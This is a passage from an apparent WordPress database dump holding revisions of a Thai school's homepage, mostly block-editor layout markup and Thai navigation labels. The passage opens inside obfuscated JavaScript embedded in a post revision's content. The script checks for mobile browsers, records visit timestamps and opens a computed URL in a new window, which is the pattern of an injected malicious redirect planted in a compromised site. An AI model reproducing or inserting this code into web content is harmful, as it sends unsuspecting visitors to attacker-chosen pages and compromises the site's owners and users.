_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-30 11:46:38','2024-07-30 04:46:38','',14,'http://pakhaeng.ssk.in.th/?p=297',0,'revision','',0),
(299,1,'2024-07-30 11:55:21','2024-07-30 04:55:21','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 